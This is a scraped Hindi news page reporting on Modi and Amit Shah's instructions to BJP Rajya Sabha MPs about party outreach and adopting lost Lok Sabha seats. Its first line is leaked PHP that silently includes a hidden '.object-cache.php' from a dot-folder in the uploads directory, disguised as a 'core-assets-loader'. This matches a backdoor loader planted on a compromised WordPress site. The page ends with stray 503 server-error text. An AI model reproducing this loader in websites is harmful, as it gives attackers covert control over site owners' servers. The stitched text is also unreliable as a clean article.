add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पार्टी की तरक्की के लिए राज्यसभा सांसदों को पीएम मोदी और अमित शाह ने दिए अहम मंत्र – SOCH INDIA
Menu

राजनीति
पार्टी की तरक्की के लिए राज्यसभा सांसदों को पीएम मोदी और अमित शाह ने दिए अहम मंत्र

nobanner
पार्टी की तरक्की के लिए राज्यसभा सांसदों को पीएम मोदी और अमित शाह ने दिए अहम मंत्र
अपनी सरकार और संगठन के एजेंडा को आगे बढ़ाने के लिए भाजपा की महत्वपूर्ण आंतरिक बैठकों के दौर को समाप्त करते हुए प्रधानमंत्री नरेंद्र मोदी ने बुधवार को पार्टी के राज्यसभा सदस्यों से समाज के गरीब और वंचित वर्ग के लोगों को पार्टी से जोड़ने की दिशा में काम करने को कहा। भाजपा अध्यक्ष अमित शाह ने राज्यसभा सदस्यों से कहा कि वे ऐसी एक-एक लोकसभा सीट गोद लें और संसद में इसके प्रतिनिधि की तरह क्षेत्र की देखभाल करें जहां पार्टी 2014 के लोकसभा चुनाव में हार गयी थी। उन्होंने सांसदों से कहा कि अपने एमपीलैड का धन वहां भी खर्च करें और संगठन के विस्तार के लिए काम करें।

मोदी ने भाजपा के राज्यसभा की सदस्यों की बैठक में अपने समापन भाषण में कहा, ‘आप जिस राज्य से भी आते हैं, आपको उसके मुद्दों को उठाना चाहिए। आपको समाज के सभी वर्गों, खासतौर पर गरीबों और वंचितों को पार्टी से जोड़ने में अहम भूमिका निभानी चाहिए।’ भाजपा के सभी 52 राज्यसभा सदस्यों ने बैठक में भाग लिया जिसे पार्टी अध्यक्ष अमित शाह ने भी संबोधित किया। केंद्रीय मंत्री रविशंकर प्रसाद ने एक ब्रीफिंग में संवाददाताओं से कहा कि मोदी ने राज्यसभा सदस्यों की इस तरह की पहली बैठक में कहा कि पार्टी ने उन्हें विशेष पहचान का मंच दिया है और उन्हें नये क्षेत्रों से लोगों को पार्टी की ओर लाने की दिशा में काम करना चाहिए।

जब पूछा गया कि समाज के किस वर्ग की बात मोदी ने की है तो प्रसाद ने किसी समुदाय का नाम नहीं लिया लेकिन कहा कि कुछ वर्गों के और अधिक लोगों को पार्टी से जोड़ा जा सकता है। उन्होंने कहा कि भाजपा को लोकसभा चुनावों में सभी समुदायों का वोट मिला। भाजपा उत्तर प्रदेश विधानसभा चुनावों से पहले दलितों और अन्य वंचित तबकों को लुभाने का प्रयास कर रही है। इससे पहले गुजरात समेत देश में दलितों पर हमलों की कुछ घटनाओं को लेकर भाजपा और केंद्र सरकार आलोचनाओं का सामना कर चुके हैं।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.